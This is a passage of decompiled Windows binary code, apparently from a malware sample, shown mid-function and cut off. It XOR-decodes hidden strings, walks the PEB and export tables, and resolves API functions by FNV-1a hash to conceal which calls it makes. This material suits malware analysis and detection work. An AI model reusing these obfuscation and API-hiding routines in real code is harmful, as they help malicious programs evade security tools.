				intOrPtr* _v508;
				intOrPtr _v512;
				intOrPtr* _v516;
				signed int _v520;
				intOrPtr* _v524;
				intOrPtr _v528;
				intOrPtr* _v532;
				signed int _v536;
				intOrPtr* _v540;
				intOrPtr _v544;
				intOrPtr* _v548;
				signed int _v552;
				intOrPtr* _v556;
				intOrPtr _v560;
				intOrPtr* _v564;
				signed int _v568;
				intOrPtr* _v572;
				intOrPtr _v576;
				intOrPtr* _v580;
				signed int _v584;
				intOrPtr* _v588;
				signed int _v592;
				intOrPtr* _v596;
				signed int _v600;
				intOrPtr* _v604;
				signed int _v608;
				intOrPtr* _v612;
				signed int _v616;
				intOrPtr* _v620;
				signed int _v624;
				intOrPtr* _v628;
				signed int _v632;
				intOrPtr* _v636;
				signed int _v640;
				intOrPtr* _v644;
				signed int _v648;
				intOrPtr* _v652;
				signed int _v656;
				char _v657;
				char _v658;
				char _v659;
				char _v660;
				short _v662;
				short _v664;
				short _v666;
				short _v668;
				short _v670;
				short _v672;
				short _v674;
				short _v676;
				short _v678;
				short _v680;
				short _v682;
				short _v684;
				short _v686;
				short _v688;
				short _v690;
				char _v691;
				signed char _v692;
				short _v696;
				short _v698;
				short _v700;
				short _v702;
				short _v704;
				short _v706;
				short _v708;
				short _v710;
				char _v711;
				signed char _v712;
				short _v716;
				short _v718;
				short _v720;
				short _v722;
				short _v724;
				short _v726;
				short _v728;
				short _v730;
				char _v731;
				signed char _v732;
				signed char _v736;
				signed char _v740;
				signed char _v744;
				signed char _v748;
				signed char _v752;
				signed char _v756;
				signed char _v760;
				signed char _v764;
				signed char _v768;
				signed char _v772;
				signed char _v776;
				signed char _v780;
				signed char _v784;
				signed char _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				char _v798;
				signed char _v800;
				short _v804;
				short _v806;
				short _v808;
				short _v810;
				short _v812;
				short _v814;
				short _v816;
				short _v818;
				short _v820;
				short _v822;
				short _v824;
				short _v826;
				char _v827;
				void _v828;
				short _v832;
				short _v834;
				short _v836;
				short _v838;
				short _v840;
				short _v842;
				short _v844;
				short _v846;
				short _v848;
				short _v850;
				short _v852;
				short _v854;
				char _v855;
				void _v856;
				short _v858;
				intOrPtr _v862;
				intOrPtr _v866;
				intOrPtr _v870;
				char _v872;
				signed char _v874;
				short _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				char _v890;
				signed char _v892;
				signed char* _v896;
				short* _v900;
				signed char* _v904;
				signed char* _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr* _v924;
				intOrPtr _v928;
				signed int _v932;
				intOrPtr* _v936;
				signed int _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr* _v956;
				intOrPtr _v960;
				char _v964;
				intOrPtr* _v968;
				char _v972;
				intOrPtr* _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr* _v996;
				intOrPtr _v1000;
				signed int _v1004;
				intOrPtr* _v1008;
				signed int _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr* _v1028;
				intOrPtr _v1032;
				char _v1036;
				intOrPtr* _v1040;
				char _v1044;
				intOrPtr* _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr* _v1068;
				intOrPtr _v1072;
				signed int _v1076;
				intOrPtr* _v1080;
				signed int _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr* _v1100;
				intOrPtr _v1104;
				char _v1108;
				intOrPtr* _v1112;
				char _v1116;
				intOrPtr* _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				char* _v1132;
				signed short* _v1136;
				char* _v1140;
				short* _v1144;
				char* _v1148;
				short* _v1152;
				char _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr* _v1168;
				intOrPtr _v1172;
				signed int _v1176;
				intOrPtr* _v1180;
				signed int _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr* _v1200;
				intOrPtr _v1204;
				char _v1208;
				intOrPtr* _v1212;
				char _v1216;
				intOrPtr* _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				char* _v1232;
				signed short* _v1236;
				char* _v1240;
				short* _v1244;
				char* _v1248;
				short* _v1252;
				char _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr* _v1268;
				intOrPtr _v1272;
				signed int _v1276;
				intOrPtr* _v1280;
				signed int _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr* _v1300;
				intOrPtr _v1304;
				char _v1308;
				intOrPtr* _v1312;
				char _v1316;
				intOrPtr* _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				char* _v1332;
				signed short* _v1336;
				char* _v1340;
				short* _v1344;
				char* _v1348;
				short* _v1352;
				char _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr* _v1368;
				intOrPtr _v1372;
				signed int _v1376;
				intOrPtr* _v1380;
				signed int _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr* _v1400;
				intOrPtr _v1404;
				char _v1408;
				intOrPtr* _v1412;
				char _v1416;
				intOrPtr* _v1420;
				intOrPtr _v1424;
				intOrPtr _v1428;
				intOrPtr _v1432;
				intOrPtr _v1436;
				intOrPtr* _v1440;
				intOrPtr _v1444;
				signed int _v1448;
				intOrPtr* _v1452;
				signed int _v1456;
				intOrPtr _v1460;
				intOrPtr _v1464;
				intOrPtr _v1468;
				intOrPtr* _v1472;
				intOrPtr _v1476;
				char _v1480;
				intOrPtr* _v1484;
				char _v1488;
				intOrPtr* _v1492;
				intOrPtr _v1496;
				intOrPtr _v1500;
				intOrPtr _v1504;
				intOrPtr _v1508;
				intOrPtr* _v1512;
				intOrPtr _v1516;
				signed int _v1520;
				intOrPtr* _v1524;
				signed int _v1528;
				intOrPtr _v1532;
				intOrPtr _v1536;
				intOrPtr _v1540;
				intOrPtr* _v1544;
				intOrPtr _v1548;
				char _v1552;
				intOrPtr* _v1556;
				char _v1560;
				intOrPtr* _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr* _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				intOrPtr* _v1596;
				signed int _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr* _v1616;
				intOrPtr _v1620;
				char* _v1624;
				intOrPtr* _v1628;
				char _v1632;
				intOrPtr* _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				signed char* _v1648;
				signed short* _v1652;
				signed char* _v1656;
				short* _v1660;
				signed char* _v1664;
				short* _v1668;
				signed char* _v1672;
				signed char* _v1676;
				signed short* _v1680;
				signed char* _v1684;
				short* _v1688;
				signed char* _v1692;
				short* _v1696;
				signed char* _v1700;
				char* _v1704;
				signed short* _v1708;
				char* _v1712;
				short* _v1716;
				char* _v1720;
				short* _v1724;
				char _v1728;
				intOrPtr _v1732;
				intOrPtr _v1736;
				intOrPtr* _v1740;
				intOrPtr _v1744;
				signed int _v1748;
				intOrPtr* _v1752;
				signed int _v1756;
				intOrPtr _v1760;
				intOrPtr _v1764;
				intOrPtr _v1768;
				intOrPtr* _v1772;
				intOrPtr _v1776;
				char _v1780;
				intOrPtr* _v1784;
				char _v1788;
				intOrPtr* _v1792;
				intOrPtr _v1796;
				intOrPtr _v1800;
				char* _v1804;
				signed short* _v1808;
				char* _v1812;
				short* _v1816;
				char* _v1820;
				short* _v1824;
				char _v1828;
				intOrPtr _v1832;
				intOrPtr _v1836;
				intOrPtr* _v1840;
				intOrPtr _v1844;
				signed int _v1848;
				intOrPtr* _v1852;
				signed int _v1856;
				intOrPtr _v1860;
				intOrPtr _v1864;
				intOrPtr _v1868;
				intOrPtr* _v1872;
				intOrPtr _v1876;
				char _v1880;
				intOrPtr* _v1884;
				char _v1888;
				intOrPtr* _v1892;
				intOrPtr _v1896;
				intOrPtr _v1900;
				intOrPtr _v1904;
				intOrPtr _v1908;
				intOrPtr* _v1912;
				intOrPtr _v1916;
				signed int _v1920;
				intOrPtr* _v1924;
				signed int _v1928;
				intOrPtr _v1932;
				intOrPtr _v1936;
				intOrPtr _v1940;
				intOrPtr* _v1944;
				intOrPtr _v1948;
				char _v1952;
				intOrPtr* _v1956;
				char _v1960;
				intOrPtr* _v1964;
				intOrPtr _v1968;
				intOrPtr _v1972;
				intOrPtr _v1976;
				intOrPtr _v1980;
				intOrPtr* _v1984;
				intOrPtr _v1988;
				signed int _v1992;
				intOrPtr* _v1996;
				signed int _v2000;
				intOrPtr _v2004;
				intOrPtr _v2008;
				intOrPtr _v2012;
				intOrPtr* _v2016;
				intOrPtr _v2020;
				char _v2024;
				intOrPtr* _v2028;
				char _v2032;
				intOrPtr* _v2036;
				intOrPtr _v2040;
				intOrPtr _v2044;
				intOrPtr _v2048;
				intOrPtr _v2052;
				intOrPtr* _v2056;
				intOrPtr _v2060;
				signed int _v2064;
				intOrPtr* _v2068;
				signed int _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr* _v2088;
				intOrPtr _v2092;
				char* _v2096;
				intOrPtr* _v2100;
				char _v2104;
				intOrPtr* _v2108;
				intOrPtr _v2112;
				intOrPtr _v2116;
				signed char* _v2120;
				signed short* _v2124;
				signed char* _v2128;
				short* _v2132;
				signed char* _v2136;
				short* _v2140;
				signed char* _v2144;
				signed char* _v2148;
				signed short* _v2152;
				signed char* _v2156;
				short* _v2160;
				signed char* _v2164;
				short* _v2168;
				signed char* _v2172;
				intOrPtr _v2176;
				intOrPtr _v2180;
				intOrPtr _v2184;
				intOrPtr _v2188;
				intOrPtr _v2192;
				intOrPtr _v2196;
				intOrPtr _v2200;
				intOrPtr _v2204;
				intOrPtr _v2208;
				intOrPtr _v2212;
				intOrPtr _v2216;
				intOrPtr _v2220;
				intOrPtr _v2224;
				intOrPtr _v2228;
				intOrPtr _v2232;
				intOrPtr _v2236;
				intOrPtr _v2240;
				intOrPtr _v2244;
				intOrPtr _v2248;
				intOrPtr _v2252;
				intOrPtr _v2256;
				intOrPtr _v2260;
				intOrPtr _v2264;
				intOrPtr _v2268;
				intOrPtr _v2272;
				intOrPtr _v2276;
				intOrPtr _v2280;
				intOrPtr _v2284;
				signed char* _v2288;
				signed short* _v2292;
				signed char* _v2296;
				short* _v2300;
				signed char* _v2304;
				short* _v2308;
				signed char* _v2312;
				signed char* _v2316;
				intOrPtr _v2320;
				signed char* _v2324;
				signed short* _v2328;
				signed char* _v2332;
				short* _v2336;
				signed char* _v2340;
				short* _v2344;
				signed char* _v2348;
				signed char* _v2352;
				intOrPtr _v2356;
				signed char* _v2360;
				signed short* _v2364;
				signed char* _v2368;
				short* _v2372;
				intOrPtr _v2376;
				signed char _v2380;
				char* _v2384;
				signed char* _v2388;
				signed char* _v2392;
				char _v2396;
				signed int _v2400;
				signed char _v2404;
				char* _v2408;
				signed char* _v2412;
				signed char* _v2416;
				char _v2420;
				intOrPtr _v2424;
				signed int _v2428;
				signed int _v2432;
				signed int _v2436;
				signed int _v2440;
				signed int _v2444;
				intOrPtr _v2448;
				intOrPtr _v2452;
				intOrPtr _v2456;
				intOrPtr _v2460;
				intOrPtr _v2464;
				intOrPtr _v2468;
				intOrPtr _v2472;
				intOrPtr _v2476;
				char _v2500;
				void _v2502;
				char _v2526;
				void _v2528;
				char _v2562;
				char _v2606;
				char _v2650;
				char _v2694;
				char _v2748;
				char _v2812;
				char _v2876;
				char _v2944;
				char _v3012;
				char _v3080;
				char _v4120;
				char _v5160;
				char _v9260;
				char _v10300;
				intOrPtr _t2263;
				intOrPtr _t2279;
				intOrPtr _t2302;
				intOrPtr _t2759;
				intOrPtr _t2773;
				intOrPtr _t2805;
				intOrPtr _t2888;
				intOrPtr _t3033;
				intOrPtr _t3059;
				intOrPtr _t3262;
				intOrPtr _t3289;
				intOrPtr _t3333;
				intOrPtr _t3347;
				intOrPtr _t3472;
				intOrPtr _t3493;
				intOrPtr _t3519;

				E6E45A6C0(0x2838);
				E6E41AA70( &_v2944, 0, 0x44);
				E6E41AA70( &_v3012, 0, 0x44);
				E6E41AA70( &_v3080, 0, 0x44);
				_v19 = 0;
				_v2320 = E6E411FC0(L"Kernel32.dll", 0);
				_v144 = E6E412800( &_v19,  &_v2562);
				_v140 = 0;
				while(_v140 < 0xf) {
					_v2288 =  &(_v144[2]);
					_v2292 = _v2288 + _v140 * 2;
					_v662 =  *_v2292 & 0x0000ffff ^  *_v144;
					_v2296 =  &(_v144[2]);
					_v2300 = _v2296 + _v140 * 2;
					 *_v2300 = _v662;
					_v140 = _v140 + 1;
				}
				_v2304 =  &(_v144[2]);
				_v2308 = _v2304 + (0xf << 1);
				 *_v2308 = 0;
				_v2312 =  &(_v144[2]);
				_v2316 = _v2312;
				_v2320(_v2316,  &_v4120, 0x410);
				_v20 = 0;
				_v2356 = E6E411FC0(L"Kernel32.dll", 0);
				_v152 = E6E414700( &_v20,  &_v2748);
				_v148 = 0;
				while(_v148 < 0x19) {
					_v2324 =  &(_v152[2]);
					_v2328 = _v2324 + _v148 * 2;
					_v664 =  *_v2328 & 0x0000ffff ^  *_v152;
					_v2332 =  &(_v152[2]);
					_v2336 = _v2332 + _v148 * 2;
					 *_v2336 = _v664;
					_v148 = _v148 + 1;
				}
				_v2340 =  &(_v152[2]);
				_v2344 = _v2340 + (0x19 << 1);
				 *_v2344 = 0;
				_v2348 =  &(_v152[2]);
				_v2352 = _v2348;
				_v2356(_v2352,  &_v10300, 0x410);
				_v21 = 0;
				_v912 = E6E411FC0(L"Kernel32.dll", 0);
				_v160 = E6E412EE0( &_v21,  &_v2606);
				_v156 = 0;
				while(_v156 < 0x14) {
					_v2360 =  &(_v160[2]);
					_v2364 = _v2360 + _v156 * 2;
					_v666 =  *_v2364 & 0x0000ffff ^  *_v160;
					_v2368 =  &(_v160[2]);
					_v2372 = _v2368 + _v156 * 2;
					 *_v2372 = _v666;
					_v156 = _v156 + 1;
				}
				_v896 =  &(_v160[2]);
				_v900 = _v896 + (0x14 << 1);
				 *_v900 = 0;
				_v904 =  &(_v160[2]);
				_v908 = _v904;
				_v912(_v908,  &_v5160, 0x410);
				_v964 =  &_v10300;
				_v972 =  &_v4120;
				_v448 = _v2448;
				_v916 =  *[fs:0x30];
				_v920 =  *((intOrPtr*)(_v916 + 0xc));
				_v924 =  *((intOrPtr*)(_v920 + 0xc));
				_v444 = _v924;
				do {
					_v220 =  *((intOrPtr*)(_v444 + 0x18));
					_v280 = _v220;
					_v928 = _v220 +  *((intOrPtr*)(_v220 + 0x3c));
					_t2759 = _v928;
					_v2180 =  *((intOrPtr*)(_t2759 + 0x78));
					_v2176 =  *((intOrPtr*)(_t2759 + 0x7c));
					_v276 = _v220 + _v2180;
					_v272 = _v2176;
					if(_v276 == _v280) {
						_v752 = 0;
					} else {
						_v752 = 1;
					}
					_v22 = _v752;
					if((_v22 & 0x000000ff) != 0) {
						_v164 =  *((intOrPtr*)(_v276 + 0x18));
						while(1) {
							_v932 = _v164;
							_v164 = _v164 - 1;
							if(_v932 == 0) {
								goto L26;
							}
							_v936 = _v280 +  *((intOrPtr*)(_v280 +  *((intOrPtr*)(_v276 + 0x20)) + _v164 * 4));
							_v436 = _v936;
							_v440 = 0x811c9dc5;
							while(1) {
								_v23 =  *_v436;
								_v436 = _v436 + 1;
								_v5 = _v23;
								if(_v5 == 0) {
									break;
								}
								L22:
								_v440 = (_v5 ^ _v440) * 0x1000193;
							}
							_v940 = _v440;
							if(_v940 != 0x411c4d3) {
								continue;
							} else {
								_v948 = _v280 +  *((intOrPtr*)(_v276 + 0x1c));
								_v944 = _v280 +  *((intOrPtr*)(_v276 + 0x24));
								_v952 = _v280 +  *((intOrPtr*)(_v948 + ( *(_v944 + _v164 * 2) & 0x0000ffff) * 4));
								_v448 = _v952;
								L28:
								_v968 =  &_v964;
								_v980 =  *_v968;
								_v976 =  &_v972;
								_v984 =  *_v976;
								_v448(_v984, _v980);
								_v1036 = 0;
								_v1044 =  &_v4120;
								_v464 = _v2452;
								_v988 =  *[fs:0x30];
								_v992 =  *((intOrPtr*)(_v988 + 0xc));
								_v996 =  *((intOrPtr*)(_v992 + 0xc));
								_v460 = _v996;
								do {
									_v224 =  *((intOrPtr*)(_v460 + 0x18));
									_v292 = _v224;
									_v1000 = _v224 +  *((intOrPtr*)(_v224 + 0x3c));
									_t2773 = _v1000;
									_v2188 =  *((intOrPtr*)(_t2773 + 0x78));
									_v2184 =  *((intOrPtr*)(_t2773 + 0x7c));
									_v288 = _v224 + _v2188;
									_v284 = _v2184;
									if(_v288 == _v292) {
										_v736 = 0;
									} else {
										_v736 = 1;
									}
									_v25 = _v736;
									if((_v25 & 0x000000ff) != 0) {
										_v168 =  *((intOrPtr*)(_v288 + 0x18));
										while(1) {
											_v1004 = _v168;
											_v168 = _v168 - 1;
											if(_v1004 == 0) {
												goto L42;
											}
											_v1008 = _v292 +  *((intOrPtr*)(_v292 +  *((intOrPtr*)(_v288 + 0x20)) + _v168 * 4));
											_v452 = _v1008;
											_v456 = 0x811c9dc5;
											while(1) {
												_v26 =  *_v452;
												_v452 = _v452 + 1;
												_v6 = _v26;
												if(_v6 == 0) {
													break;
												}
												L38:
												_v456 = (_v6 ^ _v456) * 0x1000193;
											}
											_v1012 = _v456;
											if(_v1012 != 0xc6c9aef5) {
												continue;
											} else {
												_v1020 = _v292 +  *((intOrPtr*)(_v288 + 0x1c));
												_v1016 = _v292 +  *((intOrPtr*)(_v288 + 0x24));
												_v1024 = _v292 +  *((intOrPtr*)(_v1020 + ( *(_v1016 + _v168 * 2) & 0x0000ffff) * 4));
												_v464 = _v1024;
												L44:
												_v1040 =  &_v1036;
												_v1052 =  *_v1040;
												_v1048 =  &_v1044;
												_v1056 =  *_v1048;
												_push(_v1052);
												_push(_v1056);
												if(_v464() == 0) {
													return 0;
												}
												_v1108 =  &_v5160;
												_v1116 =  &_v4120;
												_v480 = _v2456;
												_v1060 =  *[fs:0x30];
												_v1064 =  *((intOrPtr*)(_v1060 + 0xc));
												_v1068 =  *((intOrPtr*)(_v1064 + 0xc));
												_v476 = _v1068;
												do {
													_v228 =  *((intOrPtr*)(_v476 + 0x18));
													_v304 = _v228;
													_v1072 = _v228 +  *((intOrPtr*)(_v228 + 0x3c));
													_t3262 = _v1072;
													_v2196 =  *((intOrPtr*)(_t3262 + 0x78));
													_v2192 =  *((intOrPtr*)(_t3262 + 0x7c));
													_v300 = _v228 + _v2196;
													_v296 = _v2192;
													if(_v300 == _v304) {
														_v740 = 0;
													} else {
														_v740 = 1;
													}
													_v28 = _v740;
													if((_v28 & 0x000000ff) != 0) {
														_v172 =  *((intOrPtr*)(_v300 + 0x18));
														while(1) {
															_v1076 = _v172;
															_v172 = _v172 - 1;
															if(_v1076 == 0) {
																goto L59;
															}
															_v1080 = _v304 +  *((intOrPtr*)(_v304 +  *((intOrPtr*)(_v300 + 0x20)) + _v172 * 4));
															_v468 = _v1080;
															_v472 = 0x811c9dc5;
															while(1) {
																_v29 =  *_v468;
																_v468 = _v468 + 1;
																_v7 = _v29;
																if(_v7 == 0) {
																	break;
																}
																L55:
																_v472 = (_v7 ^ _v472) * 0x1000193;
															}
															_v1084 = _v472;
															if(_v1084 != 0x411c4d3) {
																continue;
															} else {
																_v1092 = _v304 +  *((intOrPtr*)(_v300 + 0x1c));
																_v1088 = _v304 +  *((intOrPtr*)(_v300 + 0x24));
																_v1096 = _v304 +  *((intOrPtr*)(_v1092 + ( *(_v1088 + _v172 * 2) & 0x0000ffff) * 4));
																_v480 = _v1096;
																L61:
																_v1112 =  &_v1108;
																_v1124 =  *_v1112;
																_v1120 =  &_v1116;
																_v1128 =  *_v1120;
																_v480(_v1128, _v1124);
																_v425 = 0;
																_v692 = 0x11;
																_v691 = 0;
																_v690 = 0x3f;
																_v688 = 0x7f;
																_v686 = 0x7d;
																_v684 = 0x62;
																_v682 = 0;
																_v800 = _v692;
																_v796 = _v688;
																_v792 = _v684;
																_v176 = 0;
																while(_v176 < 4) {
																	_v1132 =  &_v798;
																	_v1136 = _v1132 + _v176 * 2;
																	_v668 =  *_v1136 & 0x0000ffff ^ _v800;
																	_v1140 =  &_v798;
																	_v1144 = _v1140 + _v176 * 2;
																	 *_v1144 = _v668;
																	_v176 = _v176 + 1;
																}
																_v1148 =  &_v798;
																_v1152 = (4 << 1) + _v1148;
																 *_v1152 = 0;
																_v1156 =  &_v798;
																_v1208 = _v1156;
																_v1216 =  &_v4120;
																_v496 = _v2460;
																_v1160 =  *[fs:0x30];
																_v1164 =  *((intOrPtr*)(_v1160 + 0xc));
																_v1168 =  *((intOrPtr*)(_v1164 + 0xc));
																_v492 = _v1168;
																do {
																	_v232 =  *((intOrPtr*)(_v492 + 0x18));
																	_v316 = _v232;
																	_v1172 = _v232 +  *((intOrPtr*)(_v232 + 0x3c));
																	_t2805 = _v1172;
																	_v2204 =  *((intOrPtr*)(_t2805 + 0x78));
																	_v2200 =  *((intOrPtr*)(_t2805 + 0x7c));
																	_v312 = _v232 + _v2204;
																	_v308 = _v2200;
																	if(_v312 == _v316) {
																		_v744 = 0;
																	} else {
																		_v744 = 1;
																	}
																	_v31 = _v744;
																	if((_v31 & 0x000000ff) != 0) {
																		_v180 =  *((intOrPtr*)(_v312 + 0x18));
																		while(1) {
																			_v1176 = _v180;
																			_v180 = _v180 - 1;
																			if(_v1176 == 0) {
																				goto L79;
																			}
																			_v1180 = _v316 +  *((intOrPtr*)(_v316 +  *((intOrPtr*)(_v312 + 0x20)) + _v180 * 4));
																			_v484 = _v1180;
																			_v488 = 0x811c9dc5;
																			while(1) {
																				_v32 =  *_v484;
																				_v484 = _v484 + 1;
																				_v8 = _v32;
																				if(_v8 == 0) {
																					break;
																				}
																				L75:
																				_v488 = (_v8 ^ _v488) * 0x1000193;
																			}
																			_v1184 = _v488;
																			if(_v1184 != 0x411c4d3) {
																				continue;
																			} else {
																				_v1192 = _v316 +  *((intOrPtr*)(_v312 + 0x1c));
																				_v1188 = _v316 +  *((intOrPtr*)(_v312 + 0x24));
																				_v1196 = _v316 +  *((intOrPtr*)(_v1192 + ( *(_v1188 + _v180 * 2) & 0x0000ffff) * 4));
																				_v496 = _v1196;
																				L81:
																				_v1212 =  &_v1208;
																				_v1224 =  *_v1212;
																				_v1220 =  &_v1216;
																				_v1228 =  *_v1220;
																				_v496(_v1228, _v1224);
																				_t3289 =  *0x6e474a7c; // 0x6e474ae8
																				if(E6E41F9B0(_t3289,  &_v4120) == 0) {
																					_t2263 =  *0x6e474a90; // 0x6e474b2c
																					if(E6E41F9B0(_t2263,  &_v4120) == 0) {
																						return 0;
																					}
																					_v659 = 0;
																					_v732 = 0x5c;
																					_v731 = 0;
																					_v730 = 0x71;
																					_v728 = 0x32;
																					_v726 = 0x7c;
																					_v724 = 0x71;
																					_v722 = 0x35;
																					_v720 = 0x66;
																					_v718 = 0x7e;
																					_v716 = 0;
																					_v892 = _v732;
																					_v888 = _v728;
																					_v884 = _v724;
																					_v880 = _v720;
																					_v876 = _v716;
																					_v96 = 0;
																					while(_v96 < 7) {
																						_v1704 =  &_v890;
																						_v1708 = _v1704 + _v96 * 2;
																						_v678 =  *_v1708 & 0x0000ffff ^ _v892;
																						_v1712 =  &_v890;
																						_v1716 = _v1712 + _v96 * 2;
																						 *_v1716 = _v678;
																						_v96 = _v96 + 1;
																					}
																					_v1720 =  &_v890;
																					_v1724 = (7 << 1) + _v1720;
																					 *_v1724 = 0;
																					_v1728 =  &_v890;
																					_v1780 = _v1728;
																					_v1788 =  &_v9260;
																					_v592 = _v2428;
																					_v1732 =  *[fs:0x30];
																					_v1736 =  *((intOrPtr*)(_v1732 + 0xc));
																					_v1740 =  *((intOrPtr*)(_v1736 + 0xc));
																					_v588 = _v1740;
																					do {
																						_v256 =  *((intOrPtr*)(_v588 + 0x18));
																						_v376 = _v256;
																						_v1744 = _v256 +  *((intOrPtr*)(_v256 + 0x3c));
																						_t2279 = _v1744;
																						_v2252 =  *((intOrPtr*)(_t2279 + 0x78));
																						_v2248 =  *((intOrPtr*)(_t2279 + 0x7c));
																						_v372 = _v256 + _v2252;
																						_v368 = _v2248;
																						if(_v372 == _v376) {
																							_v772 = 0;
																						} else {
																							_v772 = 1;
																						}
																						_v51 = _v772;
																						if((_v51 & 0x000000ff) == 0) {
																							goto L198;
																						}
																						_v100 =  *((intOrPtr*)(_v372 + 0x18));
																						while(1) {
																							_v1748 = _v100;
																							_v100 = _v100 - 1;
																							if(_v1748 == 0) {
																								goto L198;
																							}
																							_v1752 = _v376 +  *((intOrPtr*)(_v376 +  *((intOrPtr*)(_v372 + 0x20)) + _v100 * 4));
																							_v580 = _v1752;
																							_v584 = 0x811c9dc5;
																							while(1) {
																								_v52 =  *_v580;
																								_v580 = _v580 + 1;
																								_v14 = _v52;
																								if(_v14 == 0) {
																									break;
																								}
																								_v584 = (_v14 ^ _v584) * 0x1000193;
																							}
																							_v1756 = _v584;
																							if(_v1756 != 0x7e1a2725) {
																								continue;
																							}
																							_v1764 = _v376 +  *((intOrPtr*)(_v372 + 0x1c));
																							_v1760 = _v376 +  *((intOrPtr*)(_v372 + 0x24));
																							_v1768 = _v376 +  *((intOrPtr*)(_v1764 + ( *(_v1760 + _v100 * 2) & 0x0000ffff) * 4));
																							_v592 = _v1768;
																							L200:
																							_v1784 =  &_v1780;
																							_v1796 =  *_v1784;
																							_v1792 =  &_v1788;
																							_v1800 =  *_v1792;
																							_v592(_v1800, _v1796);
																							_v660 = 0;
																							_v856 = 0x1f;
																							_v855 = 0;
																							_v854 = 0x4a;
																							_v852 = 0x6f;
																							_v850 = 0x7b;
																							_v848 = 0x7e;
																							_v846 = 0x6b;
																							_v844 = 0x7a;
																							_v842 = 0x43e;
																							_v840 = 0x77;
																							_v838 = 0x7a;
																							_v836 = 0x7c;
																							_v834 = 0x74;
																							_v832 = 0;
																							memcpy( &_v2528,  &_v856, 6 << 2);
																							asm("movsw");
																							_v104 = 0;
																							while(_v104 < 0xb) {
																								_v1804 =  &_v2526;
																								_v1808 = _v1804 + _v104 * 2;
																								_v680 =  *_v1808 & 0x0000ffff ^ _v2528;
																								_v1812 =  &_v2526;
																								_v1816 = _v1812 + _v104 * 2;
																								 *_v1816 = _v680;
																								_v104 = _v104 + 1;
																							}
																							_v1820 =  &_v2526;
																							_v1824 = (0xb << 1) + _v1820;
																							 *_v1824 = 0;
																							_v1828 =  &_v2526;
																							_v1880 = _v1828;
																							_v1888 =  &_v9260;
																							_v608 = _v2432;
																							_v1832 =  *[fs:0x30];
																							_v1836 =  *((intOrPtr*)(_v1832 + 0xc));
																							_v1840 =  *((intOrPtr*)(_v1836 + 0xc));
																							_v604 = _v1840;
																							do {
																								_v208 =  *((intOrPtr*)(_v604 + 0x18));
																								_v388 = _v208;
																								_v1844 = _v208 +  *((intOrPtr*)(_v208 + 0x3c));
																								_t2302 = _v1844;
																								_v2260 =  *((intOrPtr*)(_t2302 + 0x78));
																								_v2256 =  *((intOrPtr*)(_t2302 + 0x7c));
																								_v384 = _v208 + _v2260;
																								_v380 = _v2256;
																								if(_v384 == _v388) {
																									_v776 = 0;
																								} else {
																									_v776 = 1;
																								}
																								_v54 = _v776;
																								if((_v54 & 0x000000ff) == 0) {
																									goto L218;
																								}
																								_v108 =  *((intOrPtr*)(_v384 + 0x18));
																								while(1) {
																									_v1848 = _v108;
																									_v108 = _v108 - 1;
																									if(_v1848 == 0) {
																										goto L218;
																									}
																									_v1852 = _v388 +  *((intOrPtr*)(_v388 +  *((intOrPtr*)(_v384 + 0x20)) + _v108 * 4));
																									_v596 = _v1852;
																									_v600 = 0x811c9dc5;
																									while(1) {
																										_v55 =  *_v596;
																										_v596 = _v596 + 1;
																										_v15 = _v55;
																										if(_v15 == 0) {
																											break;
																										}
																										_v600 = (_v15 ^ _v600) * 0x1000193;
																									}
																									_v1856 = _v600;
																									if(_v1856 != 0x411c4d3) {
																										continue;
																									}
																									_v1864 = _v388 +  *((intOrPtr*)(_v384 + 0x1c));
																									_v1860 = _v388 +  *((intOrPtr*)(_v384 + 0x24));
																									_v1868 = _v388 +  *((intOrPtr*)(_v1864 + ( *(_v1860 + _v108 * 2) & 0x0000ffff) * 4));
																									_v608 = _v1868;
																									L220:
																									_v1884 =  &_v1880;
																									_v1896 =  *_v1884;
																									_v1892 =  &_v1888;
																									_v1900 =  *_v1892;
																									_v608(_v1900, _v1896);
																									_v1952 = L"\" \"";
																									_v1960 =  &_v9260;
																									_v624 = _v2436;
																									_v1904 =  *[fs:0x30];
																									_v1908 =  *((intOrPtr*)(_v1904 + 0xc));
																									_v1912 =  *((intOrPtr*)(_v1908 + 0xc));
																									_v620 = _v1912;
																									do {
																										_v212 =  *((intOrPtr*)(_v620 + 0x18));
																										_v400 = _v212;
																										_v1916 = _v212 +  *((intOrPtr*)(_v212 + 0x3c));
																										_t3333 = _v1916;
																										_v2268 =  *((intOrPtr*)(_t3333 + 0x78));
																										_v2264 =  *((intOrPtr*)(_t3333 + 0x7c));
																										_v396 = _v212 + _v2268;
																										_v392 = _v2264;
																										if(_v396 == _v400) {
																											_v780 = 0;
																										} else {
																											_v780 = 1;
																										}
																										_v57 = _v780;
																										if((_v57 & 0x000000ff) == 0) {
																											goto L234;
																										}
																										_v112 =  *((intOrPtr*)(_v396 + 0x18));
																										while(1) {
																											_v1920 = _v112;
